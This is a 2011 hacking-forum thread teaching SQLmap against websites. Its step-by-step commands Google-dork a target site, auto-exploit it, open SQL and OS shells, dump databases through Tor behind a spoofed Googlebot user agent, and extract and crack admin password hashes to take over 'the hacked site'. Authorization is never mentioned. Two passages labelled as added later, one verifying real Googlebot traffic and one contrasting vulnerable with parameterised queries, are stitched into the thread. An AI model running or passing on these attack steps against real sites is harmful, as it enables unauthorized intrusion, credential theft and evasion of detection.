Author Topic: (Basic) SQLmap  (Read 3945 times)

Rawr girl

  • Sr. Member
  • ****
  • Posts: 332
  • Reputation: 13
  • Mmmm ex...ploit....tatiioooonnnn
  • Computers: iMac, macbook (2006), Dell Latitude E6400
  • iDevices: iPod touch 4G
(Basic) SQLmap
« on: August 09, 2011, 11:31:22 am »
How many of u have heard of "SQL injection?" ah I see a few hands raised... Good good. Well for all u ppl who didn't raise ur hand... SQL injection is a method of injecting SQL database code into a web site with SQL software.

If u do this by hand it's a depressing long process of usually failure. Buut... We has a lil tool that will make it quick and easy :)

It's called SQLmap.

After u download it from our repo, open up terminal and cd into /var/mobile/pentest/database/sqlmap


Once in there, u run SQLmap with python. For this tut I'll be showing u how to use google with SQLmap to search a site for a vulnerable page then auto exploit it
Type in python sqlmap.py --sql-shell -g "site:sitename.com ext:php"

Now this will tell SQLmap to search google for any pages on the target site that have the extension php and that when it successfully exploits a page, to open up an SQL database shell to execute SQL code on the site.

So now sit back and enjoy... :) it will inform u bout the attack as it goes on.
I highly suggest reading the SQLmap manual. It's well written and will help u to eventually get a metasploit shell on the server!
« Last Edit: August 09, 2011, 11:37:51 am by Rawr girl »

A12danrulz

  • Leader
  • Hero Member
  • *****
  • Posts: 4018
  • Reputation: 217
  • Badges:
Re: (Basic) SQLmap
« Reply #1 on: August 09, 2011, 11:55:11 am »
Add some useful SQL shell commands

Rawr girl

  • Sr. Member
  • ****
  • Posts: 332
  • Reputation: 13
  • Mmmm ex...ploit....tatiioooonnnn
  • Computers: iMac, macbook (2006), Dell Latitude E6400
  • iDevices: iPod touch 4G
Re: (Basic) SQLmap
« Reply #2 on: August 09, 2011, 01:25:13 pm »
I don't remember any :(

Rawr girl

  • Sr. Member
  • ****
  • Posts: 332
  • Reputation: 13
  • Mmmm ex...ploit....tatiioooonnnn
  • Computers: iMac, macbook (2006), Dell Latitude E6400
  • iDevices: iPod touch 4G
Re: (Basic) SQLmap
« Reply #3 on: August 09, 2011, 01:38:13 pm »
If u want to find all the database tables you use --dump-all instead of --sql-shell

And if u know enough about the sever u can use the --os-shell :)

lnfin8ty

  • Sr. Member
  • ****
  • Posts: 320
  • Reputation: 14
Re: (Basic) SQLmap
« Reply #4 on: August 09, 2011, 01:46:48 pm »
I believe you can use it with TOR as well with -tor. It's supposed to be used like:

~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

So that it looks like an anonymous google bot getting information from the website.

It's supposed to be THE tool for blind SQL injection too.
« Last Edit: August 09, 2011, 01:51:23 pm by lnfin8ty »
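On the server side, the Googlebot user agent in the command above proves nothing by itself: Google's published way to verify a crawler is a reverse DNS lookup of the client IP (the name must be under googlebot.com or google.com) followed by a forward lookup that returns the same IP. The following is an added example, not code from the thread; it runs that check over constructed access-log lines using constructed DNS tables (documentation-range addresses) in place of live lookups.

```python
import re

# Constructed stand-ins for DNS answers (not live lookups). A real check would use
# socket.gethostbyaddr(ip) for the reverse step and socket.gethostbyname_ex(host)
# for the forward step; the addresses below are documentation ranges, not Google's.
REVERSE_DNS = {
    "198.51.100.10": "crawl-198-51-100-10.googlebot.com",  # legitimate-looking crawler
    "203.0.113.7": "vps-7.example.net",                    # ordinary host claiming the UA
}
FORWARD_DNS = {
    "crawl-198-51-100-10.googlebot.com": ["198.51.100.10"],
    "vps-7.example.net": ["203.0.113.7"],
}

# Apache/nginx combined log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<req>[^"]*)" \d+ \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def is_verified_googlebot(ip, reverse=REVERSE_DNS.get, forward=FORWARD_DNS.get):
    """Google's published method: the PTR name must end in googlebot.com or google.com,
    and the forward lookup of that name must include the original IP."""
    host = reverse(ip)
    if not host or not host.endswith((".googlebot.com", ".google.com")):
        return False
    return ip in (forward(host) or [])

def flag_fake_googlebots(log_lines):
    """Return (ip, request) for each request with a Googlebot UA that fails verification."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and "Googlebot" in m["ua"] and not is_verified_googlebot(m["ip"]):
            flagged.append((m["ip"], m["req"]))
    return flagged

# Constructed sample lines; the UA string is the one quoted in the thread.
UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
SAMPLE_LOG = [
    f'198.51.100.10 - - [09/Aug/2011:13:46:48 +0000] "GET /index.php?cata_id=1 HTTP/1.1" 200 512 "-" "{UA}"',
    f'203.0.113.7 - - [09/Aug/2011:13:46:49 +0000] "GET /index.php?cata_id=1 HTTP/1.1" 200 512 "-" "{UA}"',
    '203.0.113.8 - - [09/Aug/2011:13:47:02 +0000] "GET /about.php HTTP/1.1" 200 100 "-" "Mozilla/5.0 Firefox/5.0"',
]

if __name__ == "__main__":
    for ip, req in flag_fake_googlebots(SAMPLE_LOG):
        print(f"unverified Googlebot claim from {ip}: {req}")
```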


Rawr girl

  • Sr. Member
  • ****
  • Posts: 332
  • Reputation: 13
  • Mmmm ex...ploit....tatiioooonnnn
  • Computers: iMac, macbook (2006), Dell Latitude E6400
  • iDevices: iPod touch 4G
Re: (Basic) SQLmap
« Reply #5 on: August 09, 2011, 01:50:37 pm »
Google ****s brix when ever I use -tor so I just have tor already on lol

lnfin8ty

  • Sr. Member
  • ****
  • Posts: 320
  • Reputation: 14
Re: (Basic) SQLmap
« Reply #6 on: August 09, 2011, 02:37:52 pm »
Yeah that looks a lot easier. Lol.

PaulBird

  • Sr. Member
  • ****
  • Posts: 485
  • Reputation: 5
  • Every problem is an opportunity in disguise
    • Google
  • Badges:
Re: (Basic) SQLmap
« Reply #7 on: August 09, 2011, 04:47:25 pm »
thnx for tutorial rawr girl :D
[Removed Image ;)]
« Last Edit: August 09, 2011, 09:32:23 pm by Admiral »
People Never Get The Flowers While They Can Still Smell Them

PaulBird

  • Sr. Member
  • ****
  • Posts: 485
  • Reputation: 5
  • Every problem is an opportunity in disguise
    • Google
  • Badges:
Re: (Basic) SQLmap
« Reply #8 on: August 09, 2011, 09:22:37 pm »
its NOT A MONKEY. its Jeramy Hilary Boob PhD.
^obv not a beatles fan :( :( :( :(
People Never Get The Flowers While They Can Still Smell Them

PaulBird

  • Sr. Member
  • ****
  • Posts: 485
  • Reputation: 5
  • Every problem is an opportunity in disguise
    • Google
  • Badges:
Re: (Basic) SQLmap
« Reply #9 on: August 09, 2011, 09:27:58 pm »
Not a good excuse haha, im 15, listen to rap. but love old stuff too :)

culture urself bro!
People Never Get The Flowers While They Can Still Smell Them


PaulBird

  • Sr. Member
  • ****
  • Posts: 485
  • Reputation: 5
  • Every problem is an opportunity in disguise
    • Google
  • Badges:
Re: (Basic) SQLmap
« Reply #10 on: August 09, 2011, 10:10:00 pm »
lmao a mexican indian???
People Never Get The Flowers While They Can Still Smell Them

A3MIRAL

  • Leader
  • Hero Member
  • *****
  • Posts: 2899
  • Reputation: 105
  • A3MIRAL -- Reporting for Duty
    • A3MIRAL
  • Badges:
  • Computers: Dell XPS15 (6 GB ram, Core i7 @ 2.0 GHz, 750 GB HDD @ 7200 RPM)
  • iDevices: iPod touch 3G 32GB, iPhone 5 32GB
Re: (Basic) SQLmap
« Reply #11 on: August 09, 2011, 10:11:39 pm »
ok enough here too please

lnfin8ty

  • Sr. Member
  • ****
  • Posts: 320
  • Reputation: 14
Re: (Basic) SQLmap
« Reply #12 on: August 10, 2011, 08:56:00 am »
So, I've been checking this out. I think it's basically blind injection, but here is what I understand. Please correct any mistakes.
We start with:
./sqlmap.py -u http://yoursitehere.com/vulnerablefile (might be user.php?id=5)
If it found the Database version continue with:

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 --dbs
That should show every database on the target system

Now you have to use the '-D' flag and pass it the name of the database you want to attack, also pass it the '--tables' flag to obtain the table names:

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 -D databasename --tables

This should return you the tables of the database.

The last step is to obtain the column names of the table we want to use, if we want to check more tables we separate them with a ','

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 -D databasename -T tablename --columns

This should give you the users table of columns.

The “final” step is to find the admin credentials and decrypt them.
Query range is specified with '--start x' and '--stop y'.
Because the admin normally is stored in the first row of the table we use this command:

./sqlmap.py -u http://yoursitehere.com/user.php?id=5 -D databasename -T tablename -C column1,column2 --dump

Then you should see the md5 hash which you take to an online decrypter or whatever.
We can now login and do whatever we want with the hacked site.

SQL helper is a nice tool for an automated attack, but until they port it to iphone, I think SQLmap is the way to go.
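Both the opening post's description of SQL injection and the enumeration walkthrough above start from the same defect: a query-string value such as id=5 pasted into the SQL text, so the database parses user input as SQL. The following is an added example, not code from the thread, using Python with an in-memory SQLite table standing in for the site's users table; it shows that pattern beside the parameterised form that removes it.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the users table the thread enumerates."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "<constructed hash>"), (5, "bob", "<constructed hash>")])
    return conn

def lookup_vulnerable(conn, user_id):
    """The pattern behind user.php?id=5: the raw query-string value is concatenated into
    the SQL text, so it is parsed as SQL and a crafted value can rewrite the WHERE clause."""
    sql = "SELECT id, name FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, user_id):
    """Hardened form: validate the type, then bind the value as a parameter so the driver
    never lets it reach the SQL grammar. The enumeration in the thread stops at step one."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (int(user_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "5"))           # only bob
    print(lookup_vulnerable(db, "5 OR 1=1"))    # every row: the condition is always true
    print(lookup_safe(db, "5"))                 # only bob
    try:
        lookup_safe(db, "5 OR 1=1")
    except ValueError as e:
        print("rejected:", e)                   # the crafted value never reaches the database
```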

Rawr girl

  • Sr. Member
  • ****
  • Posts: 332
  • Reputation: 13
  • Mmmm ex...ploit....tatiioooonnnn
  • Computers: iMac, macbook (2006), Dell Latitude E6400
  • iDevices: iPod touch 4G
Re: (Basic) SQLmap
« Reply #13 on: August 13, 2011, 10:52:28 pm »
Whoa... U should make the advanced tut lol

lnfin8ty

  • Sr. Member
  • ****
  • Posts: 320
  • Reputation: 14
Re: (Basic) SQLmap
« Reply #14 on: August 14, 2011, 03:15:38 am »
Yeah Sorry Rawr girl,
From what I read I thought that was a basic example. I've got a good book on SQL injection and it goes over SQLmap and the advanced stuff is very deep.